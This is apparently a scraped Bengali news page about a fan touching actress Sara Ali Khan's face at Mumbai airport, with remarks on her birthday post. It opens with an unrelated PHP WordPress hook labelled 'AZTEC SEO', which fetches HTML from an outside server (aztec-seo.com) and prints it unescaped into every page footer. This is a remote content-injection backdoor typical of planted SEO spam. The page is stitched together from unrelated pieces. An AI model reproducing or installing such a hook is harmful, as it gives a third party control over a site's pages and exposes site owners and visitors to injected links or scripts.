/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
কানের দুল চুরি করতে গিয়েছিলেন ? নাকি ভালোবাসা। বিমানবন্দরে অনুরাগীর আচরণ দেখে শিউরে উঠলেন অনেকেই। জয়পুর থেকে ফেরার পথে এমন অদ্ভুত অভিজ্ঞতা সারা আলি খানের। মুম্বই বিমানবন্দরে নামতে না নামতেই অনুরাগীরা এসে ছেঁকে ধরলেন তাঁকে। সাদা সালোয়ার কামিজ আর গোলাপি দুপাট্টায় ঝলমল করছিলেন নায়িকা।
সদ্য জন্মদিন পালন করে ঘরে ফিরছেন, মুখের হাসি অম্লান। তাঁকে দেখে কেউ নিজস্বীর আবদার করলেন, কেউ আবার করমর্দনের। তার মধ্যেই ঘটে গেল ব্যাপারটা। আলোকচিত্রীদের ক্যামেরায় ধরা পড়ল সেই মুহূর্ত।
দেখা যায়, এক মহিলা অনুরাগী হাত বাড়িয়ে দিলেন তাঁর দিকে। সারাও ছুঁয়ে দিলেন তাঁর হাত, কিন্তু তার পরই সেই মহিলা সারাকে অন্যভাবে ছুঁতে চাইলেন। সারার পাশ দিয়ে বেরিয়ে যাওয়ার সময় তাঁর হাত ছুঁয়ে গেল অভিনেত্রীর গাল। চুলের মধ্যে দিয়ে হাতটা লক্ষ্যভ্রষ্ট হল কি না, ভালো বোঝা গেল না।
দু’জনেই দু’দিকে হেঁটে চলে গেলেন। সেই দেখে মন্তব্যে নানাজনের নানা মত। কেউ মনে করছেন, “কানের গয়না ছিনিয়ে নিতে গিয়েছিল মহিলাটি!” কেউ আবার সারার সহনশীলতা দেখে প্রশংসায় পঞ্চমুখ। বললেন, “কী সুন্দর মিষ্টি স্বভাবের মেয়ে, কোনও অহঙ্কার নেই।”
অমৃতা সিংহ আর সাইফ আলি খানের মেয়ে সারা। সম্প্রতি উদয়পুর সফরের ছবি পোস্ট করেছেন তিনি। মা অমৃতার সঙ্গেও পোজ় দিয়েছেন তিনি। ক্যাপশনে লিখেছেন, “আমার গোটা জগৎকে শুভ জন্মদিন। আমার আনন্দ, উল্লাস হওয়ার জন্য ধন্যবাদ। ধন্যবাদ, আমার সামনে আয়না ধরার জন্য।”
https://www.instagram.com/reel/CocGoL_JwxW/?utm_source=ig_embed&ig_rid=a6326a00-2ba5-4bf2-920e-a5fbc35898dd
শেখ দৌলত, ঢাকা।